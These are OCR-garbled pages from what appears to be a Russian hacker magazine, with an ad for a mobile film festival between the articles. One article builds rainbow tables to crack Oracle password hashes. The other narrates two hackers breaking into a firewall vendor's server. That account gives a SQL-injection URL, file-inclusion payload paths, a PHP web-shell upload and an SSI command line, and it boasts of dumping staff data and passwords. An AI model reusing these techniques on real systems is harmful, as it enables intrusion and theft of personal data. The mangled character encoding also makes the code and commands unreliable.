выкачать 30-60 Гбтаблиц. Преимущество генерации своихтаблиц на самом 
деле только одно — ты сможешь использовать необходимый тебе набор 
символов и параметры таблицы. 

Н 0КАСІ-ЕКАШВ0ѴѴТАВІ-Е5 

Что касается гаіпбоѵѵ таблиц для СУБД Огасіе, я так и не нашел их в интер- 
нете в свободном доступе, чему в общем-то не особо огорчился, так как 
быложелание сгенерировать их самому. Генерировать я решил, используя 
программу ѵѵіпгідеп, входящую в состав небезызвестного саіп&абеі. Выбор 
пал на нее, потому как в ней все просто и удобно. 

Для начала разберемся с параметрами. Их немного: 

НазЬ — алгоритм генерации хэш функции. В данном случае — огасіе. 

Міп І_еп — минимальная длина пароля, обычно 0. 

Мах І_еп — максимальная длина пароля; возьмем для начала 7. 

Іпбех — идентификатор для группы таблиц (таблицы с разным индексом 
содержат разные данные). Пока оставим какесть. 

СНаіп І_еп — длина цепочки. Повышение длины отрицательно влияет на 
время генерации таблицы и время криптоанализа, зато повышает вероят- 
ность подбора. Нежелательно выставлять более 20000. Оставим пока 2400. 
СИаіп Соипі — грубо говоря, размертаблицы на диске. Если оперативной 
памяти больше 1 Гб, то выставляется 6701 8864, так как при расшифровке 
таблица будет загружаться в оперативную память и желательно, чтобы она 
поместилась целиком. Обычно больше 1 Гбтаблицы не делают. Для начала 
оставим значение поумолчанию. 

N оІТаЫеБ — количество таблиц. Соответственно, чем больше таблиц, тем 
больше вероятность перебора, но их дольше генерировать и необходимо 
иметь достаточно места для иххранения. Поумолчанию — однатаблица. 
СИагзеІ — набор символов, используемый в пароле. Мы будем использо- 
вать стандартный для Огасіе 39 символьный набор, приведенный в начале 
статьи. 

ІІзегпате — имя пользователя. Используется как раз для Огасіе паролей. В 
нашем случае будем генерировать для пользователя БУ5ТЕМ. 

С описанием вроде закончили, теперь приступим кгенерации. Если 
выставитьзначения, какуказано выше, то вероятность подбора (Зиссезз 
ргоЬаЬіІіІу) будет равняться 44 процентам, что нас совсем не устраивает. 
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По-хорошему, приемлемая вероятность должна быть около 99 
процентов, хотя это зависит отситуации. Для повышения ве- 
роятности подбора я предлагаю просто увеличить количество 
таблиц хотя бы до 8 (99,00) а лучше до 1 2 (99,91 ). Подсчитаем 
время генерации (кнопка ВепсЬтагк) и получим что-то около 
24 дней на стареньком ІпІеІСеІегоп 2.4. Время подбора пароля 
потаблице составитоколо 1 минуты: заметно лучше, чем два 
с половиной дня при взломе методом полного перебора. 
Правда, нам придется потратить 25 дней на генерацию этих 
таблиц, зато потом пароли можно щелкать, как орешки (увы, 
только 7-символьные). 

«Есть ли возможность ускорить процесс?», спросишьты. И я 
отвечу — конечноже, если генерировать таблицы не в одиноч- 
ку, а группой людей, как это делалось и делается до сих пор для 
І_М/МТІ_М/М05-хэшей на сайте ѵѵѵѵѵѵігеегаіпЬоѵѵІаЫег.сот . 
Так можно значительно ускорить процесс. Быстрее сгене- 
рировать таблицы можно и в одиночку, используя несколько 
компьютеров. Вся прелесть втом, что таблицы можно генери- 
ровать независимо на разных компьютерах. Утилита ѵѵіпгідеп, 
послетого какты укажешь все необходимые параметры, 
создает конфигурационный файл с именем ЬаЫез . Ізі. Вот 
его содержимое для нашего примера: 



Чтобы распараллелить работу над созданием таблиц, надо 
просто скопировать часть этих строк на другой компьютер 
в файл ѣаЫез . Ізі и запустить на нем утилиту ѵѵіпгідеп. 
Единственный важный момент— используемый сбагзеі: дол- 
жен быть прописан на каждом компьютере в файле сііагзеі . 
Іхі путем добавления специальной строки с набором сим- 
волов. Причем, их порядок должен быть одинаковым, иначе 
таблицы окажутся несовместимы. Конфиг-файл сЬагзеѣ . 

ЪхЪ должен выглядеть примерно так (последняя строка опи- 
сывает чарсетогасіе): 

# сЬагзеб сопбідигабіоп бііе бог ш-пгбдеп ѵі.2 
Ьу Маззітіііапо Мопбого (тао@охісі. іб) 

# сотрабіЫе мібЬ гаіпЪоѵгсгаск 1.1 апсі Іабег Ьу 
2Ьи ЗЬиапдІеі <зЬиапд1еі@1юбтаі1 . сот> 

Ъубе = [ ] 

аІрЬа = [АВСБЕЕСНЫКЬММОР0ВЗТЦУ№^У2] 

аІрЬа-зрасе = [АВСБЕЕСНШКЬММОР0КЗТЦѴМХУ2 ] 




> ѵісіео 

На ОѴБ смотри позна- 
вательный видеоурок, 
который раскрывает 
всю правду о мнимой 
защищенности паро- 
лей в Огасіе. 



огасіе 



= [АВСБЕРСНШКЬММОРОВЗТиѴМХУ20 



огас1е_огас1е#1-7_0_240 0x6710 8864. 



123456789_#$] 



ЗУ ЗТЕМ# 0 0 0 . г б ; 

огас1е_огас1е#1-7_0_2400х67108864. 
ЗУ ЗТЕМ# 0 0 1 . г б ; 

огас1е_огас1е#1-7_0_2400х67108864. 
ЗУ ЗТЕМ# 0 0 2 . г б ; 

огас1е_огас1е#1-7_0_2400х67108864. 
ЗУЗТЕМ#003 .гб; 

огас1е_огас1е#1-7_0_24 00x6710 8864. 
ЗУЗТЕМ#004 .гб; 

огас1е_огас1е#1-7_0_24 00x6710 8864. 
ЗУЗТЕМ#005 .гб; 

ог ас 1 е_огас1е # 1 - 7_0_2 400x67108864. 
ЗУ ЗТЕМ# 0 0 6 . г б ; 

огас1е_огас1е#1-7_0_2400х67108864. 
ЗУ ЗТЕМ# 0 0 7 . г б ; 



Теперь можно раскидать по одной таблице на каждый компью- 
тер, и общее время генерации существенно уменьшится. Что 
касается многоядерных процессоров, то утилита по умолча- 
нию их не поддерживает, но ничто не мешает нам создать две 
папки с программой ѵѵіпНдеп, переименоватьэкзешники в 
Ѵ7іпг^деп1 . ехе и ѵ7ІпгЬдеп2 . ехе и запустить параллельно 
генерациютаблиц на разныхядрах (прописав разныетаблицы 
заранее в ѣаЫез. Ізѣ). 

Все описанные выше действия я провел на доступных 
мне компьютерах и получил в итоге 1 2 табл и ц общим 
размером чуть более 7 Гб. Для проверки работоспособ- 
ности таблиц я собрал хэши нескольких 5У5ТЕМ пользо- 
вателей и запустил перебор по созданным таблицам. В 
итоге 2 из 3 хэшей подобрались; общее время, затрачен- 
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^ БОЛЬШЕ СИМВОЛОВ! 

Мы научились подбирать 7-символьные пароли. Чтобы сгенериро- 
вать таблицы для подбора 8-символьных паролей с тем же чарсетом 
и приемлемым Зиссевв Наіе 99,00%, нам потребуется не много ни 
мало — 64 гигабайта свободного места и полтора года времени (если 
использовать только один компьютер). Зато подбираться пароль по 
этим таблицам будет, максимум, час, а в среднем — минут двадцать. В 
сравнении с 60 днями методом полного перебора это выигрыш, и еще 
какой! Распределенная генерация 8-сим вольных та блиц уже запущена, 
и вполне вероятно, к выходу журнала они могут быть доступны на сайте, 
посвященном исследованию безопасности баз данных и ѵѵеЬ-приложе- 
н и й : ЫірѴ/сІзесга.ги . 

^ ОКАСІ_Е 1 16 И НОВОВВЕДЕНИЯ 

Все рассмотренное касалось версий Огасіе ниже 1 1 . Хотя в продакшн 
среде версия 1 1 до сих пор встречается редко, разобраться в ней не 
помешает. Тем более, дела там обстоят не так прозрачно. Для начала 
попытаемся извлечь пароли из таблицы ВВА_ЦЗЕВ.З, как это делалось в 
старых версиях. 

Огасіе БабаЬазе 11д ЕгЩегргізе ЕсШ:іоп Кеіеазе 
11.1.0.6.0 — Ргосіисбіоп 

Ѵ/іЬЬ. Ыіе РагЩі1:іопіпд, ОЬАР, БаДа Міпіпд апсі Кеаі 
Арріісабіоп Тезбіпд орбіопз 

3(2Ь> зеІесЬ изегпаше, раззѵгогсі Тгош сІЬа_изегз; 



БЗЕКМАМЕ 



РАЗЗШКБ 



МОМТ_ѴІЕУ7 

ЗУЗ 

ЗУЗТЕМ 

БВЗШР 

Очевидно, паролей тут нет, ну мы не расстраиваемся. Они есть втаблице 
БІ)5.1І5ЕН$ и, соответственно, доступ к ним — только у пользователей 
с правами администратора ЮВА). Прав 5ЕІ_ЕСТ АЫУ 01СТ10ЫАРУдля 
доступа кхэшам паролей уже недостаточно. Хранятся хэши также немного 
отлично от старых: 

3<2Ь> веІесЪ изег, раззѵгогсі, зраге4 бгош зуз.изег$; 



0 БЕЕАиЬТ_СОНЗЦМЕК_ОКОиР 



3 : 52Б6АС184ЕБЕ6Б952Е943 17СВ1С9918Б27 66С34А23С476Е460Б 
72ВБ03Р2С 

Как мы видим, теперь втаблице хранится два разныххэша. Старый 

— 77Е6В621 РЗВВ777А, совместимый с Огасіе 1 0д, и новый. На самом деле, 
последняя строка листинга — это не хэш в чистом виде. Первые 20 байт 

— это зба-1 хэш пароля, а последние 1 0 — случайный за II. 

Что касается нового алгоритма, в нем исправлены предыдущие ошибки. 
Во-первых, пароль становится «регистро-зависимым», что существенно 
увеличивает алфавитсимволов для перебора. Во-вторых, в качестве соли 
используется случайное значение. Это можно проверить, меняя пользо- 
вателю пароль на такой же, в результате чего хэш изменится. Все говорит 
отом, что Огасіе действительно решили заняться своей безопасностью, 
но, как обычно, ложку дегтя мы все-таки найдем. Дело втом, что ситуация 
очень напоминаетисторию с ОС ѴѴіпсІоѵѵз и І_М/І\ІТІ_М-хэшами. Там, если 
вы помните, старый хэш хранится в системе вместе с новым, что позволяет 
с легкостью расшифровать любые пароли менее 14 символов, используя 
старый хэш. Ситуация в Огасіе такая же: видимо, для совместимости со 
старыми приложениями втаблице, какуже упоминалось, хранится старый 
хэш. Значит, ничто нам не мешает подбирать к нему пароли, как мы делали 
это для старых версий. 

Существует один нюанс, также как и с І_М/ЫТІ_М-хэшами: когда хэш 
расшифруется, то пароль по понятным причинам может не совпасть с 
настоящим (старый алгоритм хранения паролей не различает регистров, 
а новый уже различает). Например, мы подобрали пароль к старому хэшу 
и он оказался «раззѵѵсі». Поскольку старый хэш не различает регистров, 
вполне возможно, что настоящий пароль — «РаззѴѴсІ». 

Но нас это нисколько не останавливает, ведь мы можем перебрать все 
варианты написания одного слова тем же кайном (саіп&абеі), а затем 
использоватьТНС-ОгакеІ (переборщик паролей кОгасІе 1 1 д ) , — и это 
займетсчитанные секунды. Способ гораздо эффективнее, чем заморачи- 
ваться с подбором паролей к5НА-1 хэшам. В итоге, с доступом ктаблице 
с хэшами паролей вероятность подбора практически не отличается для 
всех версий СУБД Огасіе. И там, и там у нас есть большие шансы взломать 
пароль. Вот и все на сегодня, надеюсь, ты хорошо усвоил суть рассмотрен- 
ной проблемы, цц 
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□ имур Бекмамбетов, который когда-то давно начинал малень- 
кими короткометражками, затем занимался роликами для 
известныхтелеканалов. Недавноже он завершил картину 
сучастием Анжелины Джоли и бюджетом $65 миллионов, а 
это самый дорогой кинопроект, которым когда-либо управлял человек, 
говорящий по-русски. 

Теперь и тыполучил шанс показать себя, реализовыватьсвои идеи. 
Компания МТС и Союз кинематографистов России решили дать тебе такой 
шанс и запустили «Фестиваль Мобильного кино». Проектуникальный. 

Это первый открытый международный фестиваль короткометражных 
фильмовдля профессионалов и любителей. Фильмы могут быть сняты на 
любые видеокамеры: начиная стех, что встроены в мобильныетелефоны, 
и заканчивая профессиональными. При хронометраже порядка 1 0 минут 
ильм должен иметь сюжетную линию, заставляющую зрителей заду- 
маться, сопереживать, радоваться. Это фильм с собственной атмосферой, 
яркой идей и еетворческой реализацией — то, чем и славятся любитель- 
ские миниатюры. 

В рамках фестиваля пройдут два конкурса: профессиональный и люби- 
тельский. В профессиональном конкурсе участвуютфильмы начинающих 
режиссеров, студентов и выпускников кинематографических и теат- 




Всегда приятно похвастаться друзьям 
ловко снятым видеороликом на мо- 
бильный телефон, в котором тяжелен- 
ный каток устраивает гонки с троллей- 
бусом или сногсшибательные девушки 
исполняют на улице секси-танцы. 

До недавнего времени максимум, что 
ты мог сделать со своим роликом, — это 
залить его на видеохостинг и получать 
удовлетворение от того, что его кто-то 
скачивает, смотрит и оценивает. 

Но недавно у тебя появилась уникаль- 
ная возможность поучаствовать в 
настоящем кино-конкурсе, который 
только что запустила компания МТС и 
Союз кинематографистов России. 

Ты можешь участвовать в этом конкур- 
се, даже если до этого ни разу не имел 
дело с кино и монтажным софтом. 
Профессионализм — не главное в этом 
конкурсе. Куда важнее твои идеи и 
твой энтузиазм! 



ральных ВУЗов. А в любительском конкурсе могут принять участие все 
желающие, втом числе и ты! Для того чтобы стать участи и ком, необходимо 
до 1 5 июня 2008 года отснять материал и разместить готовый фильм в 
Интернете на специальном сайте фестиваля 

ѵѵѵѵѵѵ.тоЫІкіпоіезІ:. ги . Еще удобнее сделать это с ѴѴАР-портала «МТС- 
Сити» [ ѵѵар.ітйзсйу.ги ). с его помощью абоненты МТС могут загружать 
свои фильмы на сайтфестиваля прямо со своего мобильного телефона. 
Все фильмы, участвующие в любительском конкурсе, будут доступны для 
просмотра на сайте щмѵѵ.тоЫІкіпоіезСги . а каждый посетитель сможет 
принять участие в онлайн-голосовании. По его результатам будут опреде- 
ляться претенденты на победу. 

Словом, если ты давно вынашиваешь идею отснять классный материал, 
показать всем на что ты способен, самое время позвать друзей и начать 
съемки. Наконецутебя есть шанс получить оценку не просто от приятелей 
и пользователей Интернет, но, самое главное, от авторитетного жюри, 
состоящего из признанных мэтров киноискусства. 

Когда еще будеттакая возможность? Это отличный шанс для тебя! 

Ты можешь прославиться и выиграть классные призы: годовое подключе- 
ние на безлимитный тариф МТС и современный ноутбук. 








ВЗЛОМ ПОРТАЛА ПОПУЛЯРНОГО БРАНДМАУЭРА 



Хочешь по-настоящему ролевого и экстремального взлома? Желаешь одним 
глазком взглянуть на работу слаженной хакерской команды? Тогда пристег- 



I 

взлом 



ВГОРЯЧЕ 
СЕРДЦЕ 
ФАИРВО 



нись! На твоих глазах хакеры пробираются в самое сердце центрального 
сервера компании А§пішт! Да-да, именно А§піШт.сот — производителя 
популярного файрвола. 



звестен уже не первый случай, когда на сайтах производи- 
телей антивирусов обнаруживаюттрояны. Еще веришь в 
защищенность, конфиденциальность и надежность? Сейчас 
ты увидишь, какхрупкая цепочка багов, казалось бы, незна- 
чительных по отдельности, разрушит миф о неприступности компаний, 
специализирующихся на сетевой безопасности. 

^ РЕКОГНОСЦИРОВКА НА МЕСТНОСТИ 

Здесь и далее: тізІегВІаск, тІ5ІегѴѴГіііе — это два молодых человека, 
состоящих в одной хакерской группе. Псевдонимы выбраны совершенно 
случайно, без подоплеки или злого умысла. Как водится, хакеры ведут поис- 
ки ресурса-жертвы и обмениваются ценной информацией. 

тіг^егВІаск: 

Вечер. Светмонитора. Окинув взглядом иконки на рабочем столе, я почему- 
то остановился на Оііірозі Рігеѵѵаіі. «Хм... чем не вариант?», — подумал я. 
Зайдя на Аапііит.сот . пошарился минут десять. Следующий сайт — аапйигп. 
ги. за ним — он же, в зоне РР... багов нигде не обнаружено. Но вот клацнув на 
ссылку Роізкі в верхнем углу, я попал на оиірозбрі . Беглый анализ сайта обнару- 
жил движок (это уже хорошо) — -Іоотіа 1.0.9. Глянув эксплоиты под эту версию, 
я уже было обрадовался, но ІР-адреса аапіІит.сот и оиірозбрі оказались раз- 
ными, а значит — снова облом. Тогда я решил посмотреть, какие соседи были на 
сайте (используя ресурс зеоІоаз.сот/ір-сІотаіпз.ЫтІ ). не особо, впрочем, рас- 
считывая наудачу, ибо проекты такого уровня, как правило, имеют собственный 
сервер, и никаких левых сайтовтам априори быть не может. Но не в этот раз! В 
списке доменов присутствовал одинокий абоиірііопе.іпк) (а что, это шанс). 



Первоначальный осмотр сайта на предмет взлома не обрадовал. На- 
стораживала лишь надпись«Контент, программирование © Апаіоіу 
БкоЫоѵ, 2001-2004», свидетельствующая о явной заброшенности ресурса. 
Все было написано на чистом НТМІ_ (никаких скриптов). Однако ссылка 
«форум» привела меня на аЬоиірЬопе.іпіо/рЬогит . где РНР-скрипты 
определенно были. Напрашивалась мысль о самописности ресурса, но 
дальнейший просмотр исходного кода страницы показал: «РЬогигп» — это 
название форума. Версия со 100% точностью была определена с помощью 
теіа-тегов. 

стеба пате= " РЬогитѴегзіоп" сопбепб="3 . 4 . За" /> 
стеба пате =" РЬо г итВВ" сопбепб= "тузді " /> 
стеба пате= " РНРѴегзіоп" сопбепб= " 4 . 4 . 7 " /> 

Фортуна была на моей стороне. Проверка багтреков выдала множество 
разных уязвимостей. Я решил заострить внимание на самой удачной. 

[Сгібісаі 5<2Ь-іпо игіаибЬ.() Рбюгитс=3 . 4 . 7 ] 
шт. зесигібубосиз . сот/агсІііѵе/1/3 60635 

В описании бага был пример эксплуатацииЛСбр; //ІосаІЬозі:/ 
рЪогшпЗ 47/ Іізѣ . рЬ.р ?И=1 &р1іогит_иг і а и і:Ъ.-ѵіагахе %2527%2 ОЗШ 
0%20тісі (раззыогсі, 2 , 1) =3 /* : НооЪаг, но когда я подставлял разные 
значения, ничего не происходило. Странно! Была уже ночь, глаза залипали, 
и, следуя русской поговорке «утро вечера мудренее», я решил оставить 
разбор полетов на следующий день. 
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НАСК-РАѴ 

Проснувшись и сев за комп, я открыл асю и обнаружил в Сети 
тізІегѴѴЬке’а, давненько не появлявшегося онлайн. 

тізіегѴЬі'ке: 

Да не исчезал я! Не поддамся на провокации мирабилисов и 
не стану хранить контакт-лист на их сервере! 

Утро. Никого нетрогаю.тихо-мирно читаюутреннюю Р55. 
Скука... 

Адпііит? Да, это будет интересно! 

гшіг^егВІаск: 

Уяснив ситуацию, он согласился помочь, и взлом был продол- 
жен общими силами. 

МізІегѴѴЬіІе начал с 50І_, причем у него она работала, а у меня 
нет. И я не понимал, в чем дело, пока не прочитал: 

ІСО-лог 

тізЬегВІаск: Так не видать разницы 
тізЬегШііЬе : Ну, форум тебе сразу при открытии 
куку ставит в браузер, и приехали 
тізЬегШііЬе : Надо вырезать куки рЬогшп_ 
соокіеаиЫі . Это особенность эксплоита 

ппіг^егУІгКе: 

Мне уже приходилось ковырять РЬогит. В багтраке 
форумов он стоит в десятке лидеров по дырам. Последняя 
версия 5й ветки была отполирована до блеска, и знакомые 
помнят, каких усилий мне стоило выполнить произвольный 
код. 

Но здесь речь шла об устаревшей Зй ветке, к тому же ветхой 
версии. Полный анализ любого движка стоитогромныхуси- 
лий, потому перспектива ковырять древний, как мамонты, 
двиг ради одного случая как-то не грела. Но в этот раз цель 
оправдывала затраты сил и времени. 

Первым делом я перетряхнул свои подборки на РЬогит, 
проверил по поиску багтраки. 

Гугл выплюнул меня на секфокус ктой же баге с игіаиііі ( ) 
от наших эстонских «коллег» (хак-группа ѵѵагахе). 
Внимательно почитав адвизори, я запомнил фразу: « . . іі 
Ыі еге із етріу $а6тіп_зеззіоп апЬ поЪ ехізіз 
СООКІЕ ѵагіаЫе $рЪ.огит_соокіеаиѣЪ. , ЬЪ.еп (апЬ 
опіу іЬеп) игідесосіед. $рЪ.огит_игіаиі:Ь шіі 
Ье ехріосіесі. . » и таІсЪ. определения ответа: «ВеЬоге 
ѣезкіпд изег тизѣ Ье Іоддесі оиі» В общем, читайте 
внимательно! 

Сходу зарезав Одиссеем куки, я обратился по адской 
ссылке, пролистнул страницу вниз и улыбнулся победному 
«Выйти с форума». 

Скуль была налицо, и теперь логичным было бы загрузить 
шелл. 

Однако я точно помнил, что даже 5я ветка форума не 
поддерживала загрузку аватар, да и аплоад аттачей был по 
дефолту запрещен. И файло грузилось прямо в БД. 
Оставалось надеяться, что нововведения 5й ветки были 
именно нововведениями. Проверить это можно было только 
после разбора двига по винтикам. Пояснив тІ5ІегВІаск'у 
фичу с куками и предоставив ему возможность сбрутить хеш 
админа, я принялся копать двиг на возможность инклуда и 
исполнения кода... 

тіг^егВІаск: 

Эксплоита куязвимости не прилагалось. Однако писать его 
не пришлось. Ссылки на рабочий эксплоит висят в топе гуг- 



ла даже выше официального сайта производителя форума. 
Не составило труда слить сплоит с первого попавшегося 
«портала по безопасности» и слегка изменить код под наш 
случай. 

Эксплоит шустро выдрал админский хеш, который благопо- 
лучно был сбручен на ѵѵѵѵѵѵ.ріаіп-іехі.іпіо . Но админка была 
переименована, и тогда я принялся за брут значений из БД 
(версия мускула, юзер и т.п.) и поиск админки. А тізІегѴѴЬке 
начал ковырять двиг форума в поисках других багов и ис- 
кать способы заливки шелла. 

Выяснилось, что на сервере стоит МуЗ(ЗІ_ 4.0. Эта версия не 
позволяет использовать подзапросы к БД. Вдобавок, что 
весьма огорчало, РіІе_Ргіѵ был установлен для текущего 
юзера БД в іаізе. 

тІ2*егУЬі*е: 

Теперьу нас был пароль админа. Но вотнезадача: в РЬогит 
существует возможность разместить админку в произволь- 
ной папке. Ни одна ссылка в нее не ведет и, не зная точного 
пути, попасть туда невозможно. Это своеобразная защита 
от взлома. 

Я временно сосредоточил свои усилия на поиске раскры- 
тия переменной $РНОКЦМ [ а6тіп_иг 1 ] , которая вела к 
заветной админпанели, а тізІегВІасктем временем мучил 
госпожу удачу и брутил путь по словарю. 

И вот кодокопание приносит результат! Дело в том, что, 
ответив единожды в любой теме, можно при постинге ука- 
зать «получать уведомление об ответах на мыло». Причем, 
админам и модерам письмо приходило с прямыми линками 
в админку на модерирование/удаление поста. 

Сменив мыло админа на свое, я выбрал произвольную тему 
и отпостил что-то вроде «да, была такая же проблема». 
Затем зарегал юзера и ответил в теме. 

Однако уведомление на мыло упорно не приходило. 

тІ5*егВ1аск: 

Наконец, брут путей до админки приносит результат! Она 
находится по адресу ЫірУ/аЬоиІрЬопе.іпіо/рЬогит/сопІхоІ . 
Все это занимает около двух часов, к этому моменту 
тізІегѴѴЬке заканчиваетанализ двига. Хорошей новостью 
от тізІегѴѴЬіІе'а было и то, что файлы все-таки сохраняются 
не в БД, а на винт. Значит, их можно будет проинклудить. 
Увы, багов, которые можно было бы заюзать на этом сервере 
без админки, не было. Несколько инклудов, конечно, име- 
лось, но версия РНР 4.4.7 не позволяет их применить. 

гтпіг^егУЬИе: 

Найденные инклуды основываются на ипзеі()-баге (РНР <= 
4.4.3,5.1.41: 

/рІіогишЗ .4.x/ /рЬогит/ іпсіех . 
ркр?РНОКШ [зеЬЬіпдз_сІіг] = [КРІ] ?&- 
1267903400=1&-1079377568=1 
/рЬогшпЗ . 4 . х/рЬогшп/ іпсЗех . 
рЪр?РНОКШ[1] = [ЬРІ] & -1267903400 = 1&- 
1079377568=1 

/ркогшпЗ . 4 .х/(5оутп1оас1.р1ір?РНОР.ЦМ[1і1еі(3.] = [ЬР 
I] %00 . ЬхЬ&-1267903400=1&-1079377568=1 
/ркогитЗ . 4 .х/асЗтіп/іпсІех. 
р!ір?]іе1р=123&:1апд= [ЬРІ] 

тіг^егВІаск: 

Мы в админпанели! Попавтуда, тізІегѴѴЬіІе добавляеттип 
«.рЬр» в доступные расширения на заливку аттачей, и дело за 
малым — прикрепить шелл к одному из сообщений админа. Но 




> ІП^О 

• рЬрРдАбтіп 
— удобный инстру- 
мент для управления 
РозІдгеЭСН- базами 
данных. Рекомен- 
дую: рЬррдасІтіп. 
зоигсеіюгде.пеЬ 




• Подробнее о 
разделении прав в 
РНР читай на ѵѵѵѵѵѵ. 
зирЬр.огд . 



• виРНР пред- 
ставляет собой 
сочетание модуля 
АрасЬе (тоб_5ирЬр) 
и выполняемого 
файла. За счет их 
совместной работы 
можно выполнять 
РНР-сценарии с 
правами их владель- 
ца. Модуль виРНР не 
используетм одул ь 
АрасЬе зиЕхес и 
поддерживает функ- 
цию журнализации. 
По производитель- 
ности зирЬр работа- 
ет медленнее, чем 
тоб_рЬр в 25 раз, но 
является хорошей 
заменой для зиехес 
(тот медленнее в 36 
раз). 



• Уникальный онлайн 
сканер, использую- 
щий симбиоз гугла 
и базы поисковых 
запросов : табпеЬ 
патеЛооІз/тасІзв 



• Хм. сІотаіпзсІЬ.сот 
не функционирует, а 
на ѵѵѵѵѵѵ. зеоіодз.сот 
ввели капчу? Тогда 
используй этот сер- 
вис: ЫірУ/веагсЬ. 
тзп.сот/гевииз. 
азрх?Ьгз{=1 &Р0РМ= 
РЕРЕ&д=ір%ЗА77.8 
8 . 21.11 
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взлом 



А вот/еію/раззѵѵсі 



встает новый вопрос: «Куда зальется шелл?» (ведь прямого линка на него 
не было]. 

Был только путь потипѵ« ѵѵѵѵѵѵ.аЬоиірЬопе.іпЬ/рЬогит/сІоѵѵпІ.оасІ.рЬр?1 .57/ 
557.іра ». 



Смотрим исходник. Генерация урла для аттача происходит по следующему 



алгоритму: 




ІССНод 

тізЬегТлПііЦе : Я вспомнил 

тізЬегМЬіЦе : В куках было что-то странное 
шізбегШібе : Ага) 

шізбегШібе : ЪЫ:р : / / аЬоибрЬопе . іпбо/аббасЬ_Ггот_ 
рЬогиш/рЫ/ 



$іпГо=$НТТР_5ЕКѴЕК_ѴАК5 [ " (ХІЕЮШЗТКШС " ] ; 

$Гі1е=Ьазепаше ( $іпбо) ; 

$агдз=ехр1обе ( " , " , Ьазепаше (бігпаше ($іпбо) ) ) ; 

$Гі1еісІ= (іпб) $агдз [1] ; 

$Гі1епаше= " $Аб1:асЬшеп1:Віг/$РогшпТаЫеЫате/$Гі1еі(і" . 
вбгЪоІомег ( збггсЬг ( $Гі1е , 

С $АИ:асЪтепЪВіг мы разобрались быстро. Он был прописан в админке и 
установлентаким: / а Ь Іа сіі_ і гот_рЪ о гит. 

Итак, часть пути известна. А вот с $ЕогитТаЫеЫате нас поджидал новый 
миниквест. 

тіе^егѴЬНе: 

Для каждой новой ветки форума динамически создается отдельная таблица 
В БД. 

Как можно догадаться, $ЕогитТаЫеЫате и есть переменная, храня- 
щая загадочное имя таблицы. Изменение имени таблицы через «АЬТЕК 
ТАВЬЕ» не предусмотрено в редактировании настроек форума. Поэтому 
имя таблицы не выводится и узнать его даже из админки невозможно. 



В куках действительно хранится названиетаблицы форума, в данном 
случае «рЫ». 

Путь до папки саттачем был найден. Защитного .ЬЬассезз ваплоде не 
лежало, и мы могли напрямую обращаться кшеллу без всяких инклудов. 
Шелл получен, нотутмы наткнулисьна проблему 5АРЕ_М00Е=0Ы ижест- 
кий запретна выход из папки /коте/зіЬез/ііоте/изегз/зкоЫоѵ/. 
Поползав по каталогам этого юзера, не нашли ничего, что могло бы дать 
больше прав. 

Впрочем, после вызова рЬріпЕо () стало ясно — капачу прикручен 
то6_іпс1и6е (возможно 551 исполнение команд). 

Апосмотрев содержимое .Ы:ассезз в корневой папке юзера, я понял, что 
модуль не только подключен, но и исправно функционирует: 

А(МНапб1ег зегѵег-рагзеб .Схб 
АббНапбІег зегѵег-рагзеб .Ьбші 

То есть, текстовые и Ыті-файлы обрабатывались через ЕхесСбІ. А это 
значит, что мы можем исполнять команды в обход сейфмода! 

Загрузив ІезІ.Ш с содержимым 



тІ2*егВ1аск: <!--#ехес стб="ипате -а" --> 

Я хотел снова врубить брут и параллельно раскапывать код на предмет 

определения именитаблицы. Нотут произошло следующее: и обратившись к нему, яувидел в ответ заветное: 




Вызов рЬріпГоО 

> обо 



Ьіпих з 1 . адпібиш. сот 2.6.9-55. ЕЬзтр #1 5МР Ргі Арг 20 
16:36:54 ЕБТ 2007 х86_64 

Теперь нам уже дают гулять по серваку за пределы /зкоЫоѵ. 

Но прав на просмотр подавляющего большинства папок и файлов все 
равно не хватает. 

гпІ5*егУМі{е: 

Конфигурационные файлы апача не удается прочитать, и мне по-прежне- 
мунеизвестен раскладправ и раздача иісі/диісі. По собственному опыту я 
замечал, что иногда раздача прав зависит от домена, а иногда — от иісі/диісі 
самого скрипта. Я предположил, что, если залить шелл в папку, доступную 
с другого домена, то сервер может стать к нам более демократичным. Так и 
произошло. 

тІ5*егВ1аск: 

Далее была найдена папка на запись, доступная с Адпііит.сот . После 
обращения к новому шеллу настроение заметно поднялось — здесь 
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гтѵ 






взлом 



ѴѴеЬ-шелл на сайте Адпііит 



> ѵісіео 

На диске кжурналу 
ты найдешь видео- 
урок, демонстрирую- 
щий основные шаги 
взломщика. 



красовалось зеленое «Ба^етосІ ОРР»! Теперь хватало прав 
на просмотр многихжеланныхпапоки скриптов с правами 
адпБит/адпіІит. Ползая по серверу в поисках коннектов к БД, 
выяснили, что сайты Агнитума основаны на Битриксе и юзают 
как МуБОБ, так и РозІдгеБСІБ. 

РозДдгеЗ<2Ь 7.4.17 оп х86_64-гейЬ.аС-1іпих-дпи, 
сотрііесі Ьу ОСС дсс (ССС) 3.4.6 20060404 (Кей 
НаИ 3.4. 6-3) 

тІ5*егѴМ*е: 

РозідгеБОБ — это вам не шутки. Тут сложнее ориентироваться 
в БД, чем в мускуле. 

Для навигации по базетребуется помнить названия кучи 
таблиц. Однако их можно посмотреть в іпЬгтабоп.БсЬета, 
знакомой нам по тзаці и туздіб. Потому, осознав нерацио- 
нальность г57 и суЬегІогсІзБСІБ, я доверил дело тізІегВІаск’у. 

тІ5*егВ1аск: 

Тогда я залил рЬрРдАбтіп, и мы пошли шариться по БД. Здесь 
были данные на сотрудников, мыла, телефоны, места жительст- 
ва, пароли отвнутренних сервисов сайта и личная переписка. 
Валялось несколько сотен ключей, просроченных с 2005/2006 
года. Новых ключей не было, как и программ для их генерации. 
Современные ключи, как оказалось, хранятся на сайтах парт- 
неров по продажам софта, например БоИкеу.ги . 

Решив, что этого достаточно, мы свалили оттуда, предусмот- 
рительно потерев все, что загружали. 

тІ5*егУЬгІе: 

Могу еще отметить, что на сервере: 

• встречались фрагменты закрытых исходных кодов продук- 
тов кампании; 

• символические линки в /еЬс/іпіі .д. и /еСс/гс.й/ 
доступны на запись, что пахнет рутом, хотя для такого ядра все 
решается банальным ядерным эксплоитом; 

• кривые права на конфиги ргойрсі позволили получитьхеши 
юзеров, впоследствии часть из них была успешно дешифрована; 
Думаю всем ясно, что, используя эти пароли, можно подме- 
нить апдейты и дистрибутивы на протрояненные. 

Также я не рекомендовал бы зиррогБу использовать дырявую 
джумлу и вордпресс любой версии в своих проектах во 
избежание появления аналогичных статей, не говоря уже о 
допотопных движках. Никакой 6ізр1ау_еггог=0РР вас не 
спасет. 



Пренебрежение директивой ореп_Ъазесііг и <іізаЫе_ 
